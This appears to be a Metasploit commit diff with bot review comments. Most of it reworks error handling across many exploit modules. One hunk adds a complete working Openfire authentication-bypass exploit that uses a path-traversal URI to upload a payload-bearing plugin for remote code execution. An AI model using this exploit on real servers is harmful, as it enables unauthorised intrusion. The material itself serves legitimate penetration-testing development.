print_status("Using automatically detected target: #{mytarget.name}")
end
diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb
index 514c7cd105..d985f735ce 100644
--- a/modules/exploits/linux/samba/lsa_transnames_heap.rb
+++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb
@@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote
if ! @checked_peerlm
if smb_peer_lm !~ /Samba 3\.0\.2[1234]/i
- raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
+ fail_with(Exploit::Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
end
end
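Review bot: The version check reports `Exploit::Failure::NoTarget`, but the message says the server is not a vulnerable Samba version, which is a statement about the host rather than about target selection. If this tree's `Exploit::Failure` defines `NotVulnerable`, then `fail_with(Exploit::Failure::NotVulnerable, "This target is not a vulnerable Samba server (#{smb_peer_lm})")` is the more accurate reason. The second check in trans2open.rb uses the same message with `NoTarget`.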
diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb
index 3dae2c66cd..a141e9a0a5 100644
--- a/modules/exploits/linux/samba/trans2open.rb
+++ b/modules/exploits/linux/samba/trans2open.rb
@@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote
if ! @checked_peerlm
if smb_peer_lm !~ /samba/i
- raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm}"
+ fail_with(Exploit::Failure::NoTarget, "This target is not a Samba server (#{smb_peer_lm}")
end
if smb_peer_lm =~ /Samba [34]\./i
- raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
+ fail_with(Exploit::Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
end
end
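Review bot: The first message in this hunk is missing its closing parenthesis, `"This target is not a Samba server (#{smb_peer_lm}"`, and the line was rewritten without fixing it. It should be `fail_with(Exploit::Failure::NoTarget, "This target is not a Samba server (#{smb_peer_lm})")`, matching the second message two lines below.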
diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
index 3629886e6b..6e997f8dc5 100644
--- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
+++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
loop do
data = sock.get_once(-1, 5) rescue nil
if not data
- raise RuntimeError, "This system does not support encryption"
+ fail_with(Exploit::Failure::Unknown, "This system does not support encryption")
end
break if data.index("\xff\xfa\x26\x02\x01")
end
diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb
index 409e129b9c..53eab16fcc 100644
--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
data_dir = File.join(Msf::Config.data_directory, "exploits", self.shortname)
if datastore["APPLETNAME"]
unless datastore["APPLETNAME"] =~ /^[a-zA-Z_$]+[a-zA-Z0-9_$]*$/
- raise ArgumentError.new("APPLETNAME must conform to rules of Java identifiers (alphanum, _ and $, must not start with a number)")
+ fail_with(Exploit::Failure::BadConfig, "APPLETNAME must conform to rules of Java identifiers (alphanum, _ and $, must not start with a number)")
end
siteloader = File.open(File.join(data_dir, "SiteLoader.class"), "rb") {|fd| fd.read(fd.stat.size) }
# Java strings are prefixed with a 2-byte, big endian length
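Review bot: The APPLETNAME check that guards the new `fail_with` uses `^` and `$`, which in Ruby match at line boundaries, so a value containing a newline passes as long as one of its lines looks like an identifier. The value is then used to build class data and file names. Anchoring to the whole string closes that gap: `unless datastore["APPLETNAME"] =~ /\A[a-zA-Z_$]+[a-zA-Z0-9_$]*\z/`. The method this check sits in starts outside the hunk.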
@@ -272,19 +272,19 @@ The following stores a bunch of intermediate files on the path to creating the s
ImportKey class used for testing was obtained from:
http://www.agentbob.info/agentbob/79-AB.html
- system("rm -rf signed_crap/*")
- File.open("signed_crap/cert.pem", "wb") { |f| f.write(@cert.to_s + @key.to_s) }
- File.open("signed_crap/key.pem", "wb") { |f| f.write(@key.to_s + @key.public_key.to_s) }
- File.open("signed_crap/unsigned.jar", "wb") { |f| f.write jar.to_s }
+ system("rm -rf signed_jar/*")
+ File.open("signed_jar/cert.pem", "wb") { |f| f.write(@cert.to_s + @key.to_s) }
+ File.open("signed_jar/key.pem", "wb") { |f| f.write(@key.to_s + @key.public_key.to_s) }
+ File.open("signed_jar/unsigned.jar", "wb") { |f| f.write jar.to_s }
- File.open("signed_crap/jarsigner-signed.jar", "wb") { |f| f.write jar.to_s }
- system("openssl x509 -in signed_crap/cert.pem -inform PEM -out signed_crap/cert.der -outform DER")
- system("openssl pkcs8 -topk8 -nocrypt -in signed_crap/key.pem -inform PEM -out signed_crap/key.der -outform DER")
- system("java -cp . ImportKey signed_crap/key.der signed_crap/cert.der")
+ File.open("signed_jar/jarsigner-signed.jar", "wb") { |f| f.write jar.to_s }
+ system("openssl x509 -in signed_jar/cert.pem -inform PEM -out signed_jar/cert.der -outform DER")
+ system("openssl pkcs8 -topk8 -nocrypt -in signed_jar/key.pem -inform PEM -out signed_jar/key.der -outform DER")
+ system("java -cp . ImportKey signed_jar/key.der signed_jar/cert.der")
system("mv ~/keystore.ImportKey ~/.keystore")
- system("jarsigner -storepass importkey signed_crap/jarsigner-signed.jar importkey")
+ system("jarsigner -storepass importkey signed_jar/jarsigner-signed.jar importkey")
jar.sign(@key, @cert)
- File.open("signed_crap/signed.jar", "wb") { |f| f.write jar.to_s }
+ File.open("signed_jar/signed.jar", "wb") { |f| f.write jar.to_s }
=end
diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
index effbd9d402..b1ffcfd64d 100644
--- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
+++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
@@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
if (not connect_login)
- raise RuntimeError, 'Unable to authenticate'
+ fail_with(Exploit::Failure::Unknown, 'Unable to authenticate')
end
# Use a copy of the target
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("FTP Banner: #{banner.strip}")
version = m[1]
else
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
regexp = Regexp.escape(version)
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
@@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
# detect the number of pad bytes
idx = stack_data.index("aaaabbbb")
if not idx
- raise RuntimeError, "Whoa, didn't find the static bytes on the stack!"
+ fail_with(Exploit::Failure::Unknown, "Whoa, didn't find the static bytes on the stack!")
end
num_pad = 0
num_pad = 4 - (idx % 4) if (idx % 4) > 0
@@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
fmtbuf.gsub!(/\xff/, "\xff\xff")
if ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true)))
if res[0,4] == "500 "
- raise RuntimeError, "Crap! Something went wrong when uploading the payload..."
+ fail_with(Exploit::Failure::Unknown, "Something went wrong when uploading the payload...")
end
end
end
diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb
index dae7ce988d..05849ad767 100644
--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
if not datastore['ExitOnSession'] and not job_id
- raise RuntimeError, "Setting ExitOnSession to false requires running as a job (exploit -j)"
+ fail_with(Exploit::Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
end
stime = Time.now.to_f
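Review bot: The ExitOnSession check rejects a local option combination rather than anything observed on the network, so `Exploit::Failure::Unknown` hides the cause. `Exploit::Failure::BadConfig` fits, and this commit already uses it in php_xmlrpc_eval.rb. php_vbulletin_template.rb carries the identical chunked-encoding message but files it under Unknown. The "COOKIENAME option must be set" and "URI option must be set" checks in both php_unserialize_zval_cookie.rb hunks, and the zlib check in safari_file_policy.rb, are the same kind of operator-side error. `exploit` continues past the end of the hunk.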
diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 0bd38d8f8b..d3ccf279f8 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -609,9 +609,9 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Getting information to undeploy...")
viewstate, entry = get_delete_info(session, version, app_base)
if (not viewstate)
- raise RuntimeError, "Unable to get viewstate"
+ fail_with(Exploit::Failure::Unknown, "Unable to get viewstate")
elsif (not entry)
- raise RuntimeError, "Unable to get entry"
+ fail_with(Exploit::Failure::Unknown, "Unable to get entry")
end
print_status("Undeploying #{app_base}...")
@@ -807,7 +807,7 @@ class Metasploit3 < Msf::Exploit::Remote
#Set target
mytarget = target
mytarget = auto_target(session, res, version) if mytarget.name =~ /Automatic/
- raise RunTimeError, "Unable to automatically select a target" if (not mytarget)
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target") if (not mytarget)
#Generate payload
p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb
index b93d5c6346..4acd1a97ac 100644
--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
if datastore['SHELL'] == 'auto'
if verb != 'HEAD'
if not (plat = detect_platform())
- raise RuntimeError, 'Unable to detect platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
end
case plat
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("SHELL set to #{datastore['SHELL']}")
else
- raise RuntimeError, 'Platform detection with HEAD is not supported, please set SHELL manually'
+ fail_with(Exploit::Failure::NoTarget, 'Platform detection with HEAD is not supported, please set SHELL manually')
end
# Payload generation already happened, therefore SHELL will
@@ -146,15 +146,17 @@ EOT
print_status("Attempting to use '#{p}' as package")
res = invoke_bshscript(bsh_script, p, verb)
if !res
- raise RuntimeError, "Unable to deploy WAR [No Response]"
+ fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR [No Response]")
end
if (res.code < 200 || res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
+ fail_with(Exploit::Failure::NoAccess, "Authentication requested: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
print_error("Upload to deploy WAR [#{res.code} #{res.message}]")
+ fail_with(Exploit::Failure::Unknown, "Invalid reply: #{res.code} #{res.message}")
else
success = true
pkg = p
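Review bot: The two added `fail_with` calls change control flow and not only the error type: before this commit a non-2xx reply printed an error and execution went on, whereas now (assuming `fail_with` raises, as it is used everywhere else in this commit) the first non-2xx reply ends the run. The `print_status("Attempting to use '#{p}' as package")` line suggests this code sits in a loop over candidate packages that begins outside the hunk; if so, the remaining candidates are no longer tried and the `if not success` check in the following hunk loses most of its purpose. If aborting is intended, the `print_error` directly before each `fail_with` repeats the same information and can be dropped. If it is not, keep the `print_error` lines and leave the failure to the `if not success` check.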
@@ -163,7 +165,7 @@ EOT
end
if not success
- raise RuntimeError("Deployment failed")
+ fail_with(Exploit::Failure::Unknown, "Failed to deploy the WAR payload")
end
diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
index 350953acd7..d480588587 100644
--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
p = payload
if datastore['SHELL'] == 'automatic'
if not (plat = detect_platform())
- raise RuntimeError, 'Unable to detect platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
end
case plat
diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb
index 16c5eb8fa5..0a65abb0e2 100644
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Attempting to automatically select a target...")
if not (plat = detect_platform())
- raise RuntimeError, 'Unable to detect platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
end
# TODO: detection requires HTML parsing
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (target.name =~ /Automatic/)
mytarget = auto_target()
if (not mytarget)
- raise RuntimeError, "Unable to automatically select a target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target")
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Find out which shell if we're using a Java target
if (mytarget.name =~ /Java/)
if not (plat = detect_platform())
- raise RuntimeError, 'Unable to detect platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
end
case plat
@@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
# UPLOAD
#
resource_uri = '/' + app_base + '.war'
- service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri
+ service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
@@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
}})
if (datastore['WARHOST'])
- service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
+ service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
end
print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
@@ -235,14 +235,14 @@ class Metasploit3 < Msf::Exploit::Remote
})
end
if (! res)
- raise RuntimeError, "Unable to deploy WAR archive [No Response]"
+ fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR archive [No Response]")
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
- raise RuntimeError, "Upload to deploy WAR archive [#{res.code} #{res.message}]"
+ fail_with(Exploit::Failure::Unknown, "Upload to deploy WAR archive [#{res.code} #{res.message}]")
end
# wait for the data to be sent
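Review bot: The 401 case here still only prints a warning and then falls through to `Exploit::Failure::Unknown`, while jboss_bshdeployer.rb in this same commit reports that case as `Exploit::Failure::NoAccess`. Putting the failure inside the branch, `fail_with(Exploit::Failure::NoAccess, "Authentication requested: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")`, would make the two JBoss modules agree. The upload hunk in tomcat_mgr_deploy.rb has the same shape. The surrounding method starts and ends outside the hunk.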
@@ -252,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 1)
waited += 1
if (waited > 30)
- raise RuntimeError, 'Server did not request WAR archive -- Maybe it cant connect back to us?'
+ fail_with(Exploit::Failure::Unknown, 'Server did not request WAR archive -- Maybe it cant connect back to us?')
end
end
diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb
new file mode 100644
index 0000000000..57c4fd84b9
--- /dev/null
+++ b/modules/exploits/multi/http/openfire_auth_bypass.rb
@@ -0,0 +1,216 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ HttpFingerprint = { :pattern => [ /(Jetty)/ ] }
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Openfire Admin Console Authentication Bypass',
+ 'Description' => %q{
+ This module exploits an authentication bypass vulnerability in the administration
+ console of Openfire servers. By using this vulnerability it is possible to
+ upload/execute a malicious Openfire plugin on the server and execute arbitrary Java
+ code. This module has been tested against Openfire 3.6.0a.
+
+ It is possible to remove the uploaded plugin after execution, however this might turn
+ the server in some kind of unstable state, making re-exploitation difficult. You might
+ want to do this manually.
+ },
+ 'Author' =>
+ [
+ 'Andreas Kurtz', # Vulnerability discovery
+ 'h0ng10' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2008-6508' ],
+ [ 'OSVDB', '49663' ],
+ [ 'BID', '32189' ],
+ [ 'EDB', '7075' ],
+ [ 'URL', 'http://community.igniterealtime.org/thread/35874' ]
+ ],
+ 'DisclosureDate' => 'Nov 10 2008',
+ 'Privileged' => true,
+ 'Platform' => ['java', 'win', 'linux' ],
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'Targets' =>
+ [
+ #
+ # Java version
+ #
+ [ 'Java Universal',
+ {
+ 'Arch' => ARCH_JAVA,
+ 'Platform' => 'java'
+ }
+ ],
+ #
+ # Platform specific targets
+ #
+ [ 'Windows x86 (Native Payload)',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Linux x86 (Native Payload)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(9090),
+ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+ OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]),
+ OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]),
+ OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]),
+ OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]),
+ ], self.class)
+ end
+
+ def check
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+
+ path = "#{base}login.jsp"
+ res = send_request_cgi(
+ {
+ 'uri' => path
+ })
+
+ if (not res) or (res.code != 200)
+ print_error("Unable to make a request to: #{path}")
+ return Exploit::CheckCode::Unknown
+ end
+
+ versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/
+
+ if versioncheck.nil? then
+ print_error("Unable to detect Openfire version")
+ return Exploit::CheckCode::Unknown
+ end
+
+ print_status("Detected version: #{$1}.#{$2}.#{$3}")
+ version = "#{$1}#{$2}#{$3}".to_i
+
+ return Exploit::CheckCode::Safe if version > 360
+
+ # Just to be sure, try to access the log page
+ path = "#{base}setup/setup-/../../log.jsp"
+ res = send_request_cgi(
+ {
+ 'uri' => path
+ })
+
+ if (not res) or (res.code != 200)
+ print_error("Failed: Error requesting #{path}")
+ return Exploit::CheckCode::Unknown
+ end
+
+ Exploit::CheckCode::Vulnerable
+ end
+
+ def get_plugin_jar(plugin_name)
+ files = [
+ [ "logo_large.gif" ],
+ [ "logo_small.gif" ],
+ [ "readme.html" ],
+ [ "changelog.html" ],
+ [ "lib", "plugin-metasploit.jar" ]
+ ]
+
+ jar = Rex::Zip::Jar.new
+ jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508"))
+
+ plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8))
+ plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8))
+
+ plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() }
+ plugin_xml.gsub!(/PLUGINNAME/, plugin_name)
+ plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc)
+ plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author)
+
+ jar.add_file("plugin.xml", plugin_xml)
+
+ jar
+ end
+
+ def exploit
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+
+ plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8))
+ plugin = get_plugin_jar(plugin_name)
+
+ arch = target.arch
+ plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
+
+ if (p = exploit_regenerate_payload(plat, arch)) == nil
+ print_error("Failed to regenerate payload")
+ return
+ end
+
+ plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
+ plugin.build_manifest
+
+ # Upload the plugin to the server
+ print_status("Uploading plugin #{plugin_name} to the server")
+ boundary = rand_text_alphanumeric(6)
+
+ data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; "
+ data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
+ data << plugin.pack
+ data << "\r\n--#{boundary}--"
+
+ res = send_request_cgi({
+ 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>
+ {
+ 'Content-Type' => 'multipart/form-data; boundary=' + boundary,
+ 'Content-Length' => data.length,
+ 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+ }
+ })
+
+
+ print_error("Warning: got no response from the upload, continuing...") if !res
+
+ # Delete the uploaded JAR file
+ if datastore['REMOVE_PLUGIN']
+ print_status("Deleting plugin #{plugin_name} from the server")
+ res = send_request_cgi({
+ 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
+ 'headers' =>
+ {
+ 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+ }
+ })
+ if not res
+ print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")
+ end
+ end
+ end
+end
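Review bot: The version pattern in `check`, `(\d)\.(\d).(\d)\s*<\/div>`, accepts only single-digit components, leaves the second dot unescaped and allows nothing between the last digit and `</div>`. If the login page prints a letter suffix, as in the 3.6.0a named in the description, or a two-digit component, the match fails and `check` reports Unknown. Gluing the digits together for `version > 360` also breaks once a component can have two digits. Matching `(\d+)\.(\d+)\.(\d+)\w*` and comparing the triple, `([$1, $2, $3].map(&:to_i) <=> [3, 6, 0]) > 0`, would make the Safe/Vulnerable answer dependable. Separately, `exploit` reports a payload regeneration failure with `print_error` and `return`, while the rest of this commit moves modules to `fail_with`.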
diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb
index 5a6090233e..b2ec6f6c97 100644
--- a/modules/exploits/multi/http/sit_file_upload.rb
+++ b/modules/exploits/multi/http/sit_file_upload.rb
@@ -110,10 +110,10 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Successfully retrieved cookie: #{session}")
return session
else
- raise RuntimeError, "Error retrieving cookie!"
+ fail_with(Exploit::Failure::Unknown, "Error retrieving cookie!")
end
else
- raise RuntimeError, "Error logging in."
+ fail_with(Exploit::Failure::Unknown, "Error logging in.")
end
end
@@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Successfully uploaded #{newpage}")
return res
else
- raise RuntimeError, "Error uploading #{newpage}"
+ fail_with(Exploit::Failure::Unknown, "Error uploading #{newpage}")
end
end
@@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Successfully retrieved upload dir: #{upload_dir}")
return upload_dir
else
- raise RuntimeError, "Error retrieving the upload dir"
+ fail_with(Exploit::Failure::Unknown, "Error retrieving the upload dir")
end
end
diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb
index 7a71310016..ff3a9d5ec3 100644
--- a/modules/exploits/multi/http/snortreport_exec.rb
+++ b/modules/exploits/multi/http/snortreport_exec.rb
@@ -30,6 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Paul Rascagneres' #itrust consulting during hack.lu 2011
],
'Version' => '$Revision$',
+ 'References' =>
+ [
+ ['OSVDB', '67739']
+ ],
'Payload' =>
{
'Compat' =>
diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb
index 5dd7457d98..a8a1d5bb00 100644
--- a/modules/exploits/multi/http/splunk_mappy_exec.rb
+++ b/modules/exploits/multi/http/splunk_mappy_exec.rb
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
else
- raise RuntimeError, "Unable to get session cookies"
+ fail_with(Exploit::Failure::NotFound, "Unable to get session cookies")
end
res = send_request_cgi(
@@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 25)
if not res or res.code != 303
- raise RuntimeError, "Unable to authenticate"
+ fail_with(Exploit::Failure::NoAccess, "Unable to authenticate")
else
session_id_port = ''
session_id = ''
diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb
index 27e451eef1..964246c8c8 100644
--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Unsupported target platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
end
handler
diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
index cd732eb105..5a07039eb5 100644
--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'java'
java_stager
else
- raise RuntimeError, 'Unsupported target platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
end
handler
diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
index ed3b505b82..0b5ccdebbf 100644
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (target.name =~ /Automatic/)
mytarget = auto_target
if (not mytarget)
- raise RuntimeError, "Unable to automatically select a target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target")
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
@@ -212,14 +212,14 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => war,
}, 20)
if (! res)
- raise RuntimeError, "Upload failed on #{path_tmp} [No Response]"
+ fail_with(Exploit::Failure::Unknown, "Upload failed on #{path_tmp} [No Response]")
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
- raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"
+ fail_with(Exploit::Failure::Unknown, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]")
end
report_auth_info(
diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb
index 86f0077c91..b088f14520 100644
--- a/modules/exploits/multi/http/wikka_spam_exec.rb
+++ b/modules/exploits/multi/http/wikka_spam_exec.rb
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
- raise RuntimeError, "#{@peer} - No cookie found, will not continue"
+ fail_with(Exploit::Failure::Unknown, "#{@peer} - No cookie found, will not continue")
end
cookie
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
login[name] = value
end
else
- raise RuntimeError, "#{@peer} - Unable to find the hidden fieldset required for login"
+ fail_with(Exploit::Failure::Unknown, "#{@peer} - Unable to find the hidden fieldset required for login")
end
# Add the rest of fields required for login
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
- raise RuntimeError, "#{@peer} - Unable to login with \"#{cred}\""
+ fail_with(Exploit::Failure::Unknown, "#{@peer} - Unable to login with \"#{cred}\"")
end
return cookie_cred
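Review bot: The new `fail_with` message interpolates `cred`, which the line above builds from `datastore['USERNAME']` and `datastore['PASSWORD']`, so the clear-text password becomes part of the failure reason and of whatever console log or report records it. The user name alone is enough to diagnose the failure: `fail_with(Exploit::Failure::NoAccess, "#{@peer} - Unable to login as #{datastore['USERNAME']}")`. The method starts outside the hunk.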
@@ -172,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
fields[n] = v
end
else
- raise RuntimeError, "#{@peer} - Cannot get necessary fields before posting a comment"
+ fail_with(Exploit::Failure::Unknown, "#{@peer} - Cannot get necessary fields before posting a comment")
end
# Generate enough URLs to trigger spam logging
